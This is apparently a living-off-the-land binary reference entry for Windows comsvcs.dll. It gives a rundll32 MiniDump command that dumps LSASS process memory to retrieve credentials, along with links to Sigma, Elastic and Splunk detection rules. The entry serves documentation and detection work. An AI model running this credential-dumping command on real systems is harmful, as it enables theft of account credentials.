Comsvcs.dll

COM+ Services

Paths

• c:\windows\system32\comsvcs.dll

Commands

Dump

Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.

Use case: Dump Lsass.exe process memory to retrieve credentials.

Privileges: SYSTEM

rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full

Detection

• Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml
• Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml
• Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
• Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml

Resources

• https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/